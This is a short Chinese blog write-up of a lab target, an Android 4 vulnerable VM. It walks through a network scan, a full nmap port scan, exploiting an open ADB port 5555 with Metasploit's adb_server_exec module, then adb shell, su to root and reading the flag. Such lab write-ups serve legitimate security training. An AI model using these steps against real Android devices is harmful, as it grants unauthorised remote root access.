Android4漏洞环境简单靶场WriteUp

枫少@KillBoy 渗透测试评论8,7621字数 697阅读2分19秒阅读模式

今天给大家分享一个简单的Android漏洞环境测试靶场。

按照惯例,思路应该是:

1.扫描IP、端口;
2.攻击
3.获取shell
4.找flag

首先,我们扫描一波找到它的IP,这时候用netdiscover,很简单,怎么用看上一篇文章

https://www.it2021.com/penetration/421.html

Android4漏洞环境简单靶场WriteUp

然后我们断定192.168.0.49应该是Android虚拟机的ip

nmap一波,

nmap -p 1-65535 -A 192.168.0.49

Android4漏洞环境简单靶场WriteUp

我们看到他开通5555/8080/22000

22000是ssh

那我们看看8080,如图,发现并没有什么卵用。

Android4漏洞环境简单靶场WriteUp

 

这时候,我们要考虑,搞一波5555端口。随之google一下。发现真的可以好好利用一下。

Android4漏洞环境简单靶场WriteUp

在Android系统中,TCP的5555旨在允许通过Android调试桥(ADB)管理设备,这是一种Android SDK功能,允许开发人员轻松地与设备通信并在其上运行命令或完全控制它们。

kali下开启msfconsole,对adb模块测试一番

Android4漏洞环境简单靶场WriteUp

use exploit/android/adb/adb_server_exec  
show options  
#看下如何配置
set rhosts 192.168.0.49  
#设置靶机地址
set lhost 192.168.0.167  
#设置本机地址
run

 

已经成功了,这时候我们需要下载adb链接工具

apt-get install adb
adb connect 192.168.0.49:5555
adb shell

成功了链接后,尝试了一下,发现可以su到root下,一顿乱翻。

在root下,目录/data/root目录下发现了flag

Android4漏洞环境简单靶场WriteUp

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
枫少@KillBoy
  • adb渗透
  • Android渗透
  • Android漏洞环境
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: